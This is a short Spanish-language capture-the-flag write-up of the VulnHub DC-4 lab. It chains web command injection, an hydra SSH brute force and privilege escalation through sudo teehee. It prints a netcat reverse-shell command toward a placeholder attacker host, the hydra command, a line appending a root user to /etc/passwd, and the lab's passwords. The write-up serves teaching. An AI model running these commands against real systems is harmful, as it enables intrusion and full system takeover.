DC-4 - VulnHub

// CLASSIFIED OPERATION REPORT //

DC-4 - VulnHub

Command injection, fuerza bruta con hydra y sudo teehee para escribir en /etc/passwd.

VULNHUB EASY 27 de junio de 2024
#Command Injection#hydra#sudo teehee#Privilege Escalation#Linux
Realizado en entornos autorizados. Solo con fines educativos.

DC-4 encadena una inyección de comandos web con un pivoteo entre usuarios y una escalada final poco habitual: teehee.

Servicios: 22 SSH · 80 HTTP

1. Command injection

Con el login por defecto admin/happy, el endpoint command.php ejecuta comandos del sistema a través del parámetro POST radio. Lo abusamos para una reverse shell:

# POST radio=... con nc -e /bin/bash <ATK> <PORT>

2. Pivoteo con hydra

En /backup/old-passwords.bak hay un diccionario de contraseñas antiguas. Lo usamos contra SSH:

hydra -l jim -P old-passwords.bak ssh://target   # jim:jibril04

Un correo local de jim filtra la contraseña de charles: ^xHhA&hvim0y.

3. Escalada — sudo teehee

sudo -l para charles muestra teehee (variante de tee). Podemos añadir un usuario root a /etc/passwd:

echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd
su hacker   # uid=0 → root

Conceptos aplicados

  • Command injection en parámetro web.
  • Fuerza bruta con diccionario “old passwords”.
  • sudo teehee — append a /etc/passwd para crear root.